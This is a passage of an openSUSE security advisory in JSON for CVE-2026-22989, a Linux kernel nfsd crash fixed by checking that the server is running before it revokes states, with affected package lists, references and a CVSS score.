"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22989"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: check that server is running in unlock_filesystem\n\nIf we are trying to unlock the filesystem via an administrative\ninterface and nfsd isn\u0027t running, it crashes the server. This\nhappens currently because nfsd4_revoke_states() access state\nstructures (eg., conf_id_hashtbl) that has been freed as a part\nof the server shutdown.\n\n[ 59.465072] Call trace:\n[ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P)\n[ 59.465830] write_unlock_fs+0x258/0x440 [nfsd]\n[ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd]\n[ 59.466780] vfs_write+0x1f0/0x938\n[ 59.467088] ksys_write+0xfc/0x1f8\n[ 59.467395] __arm64_sys_write+0x74/0xb8\n[ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8\n[ 59.468177] do_el0_svc+0x154/0x1d8\n[ 59.468489] el0_svc+0x40/0xe0\n[ 59.468767] el0t_64_sync_handler+0xa0/0xe8\n[ 59.469138] el0t_64_sync+0x1ac/0x1b0\n\nEnsure this can\u0027t happen by taking the nfsd_mutex and checking that\nthe server is still up, and then holding the mutex across the call to\nnfsd4_revoke_states().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22989",
"url": "https://www.suse.com/security/cve/CVE-2026-22989"
},
{
"category": "external",
"summary": "SUSE Bug 1257279 for CVE-2026-22989",
"url": "https://bugzilla.suse.com/1257279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
